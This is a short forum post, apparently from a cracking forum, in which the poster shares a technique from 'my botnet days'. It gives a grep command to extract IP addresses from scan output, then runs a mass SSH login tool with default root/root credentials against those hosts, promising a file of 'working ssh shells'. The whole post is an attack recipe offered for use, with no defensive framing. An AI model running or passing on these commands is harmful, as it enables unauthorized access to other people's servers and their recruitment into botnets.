OP 03 June, 2022 - 05:45 AM
I used this back in my botnet days, I hope it helps!
![[Image: ?u=https%3A%2F%2Fcache.cracked.to%2F4dc6...662e676966]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fcache.cracked.to%2F4dc6624fb648f0236921e0418e952154f8bfaeef%2F68747470733a2f2f692e696d6775722e636f6d2f5a485a364957662e676966)
Leave a like!
Code:
grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' out.txt > out.crack
and now use massh
https://github.com/btx3/massh.git
[code]
./massh.py -u root -p root -i out.crack -t 100 > success.txt
AND BAM
success.txt will have working ssh shells.
![[Image: rThP0EL.png]](https://i.imgur.com/rThP0EL.png)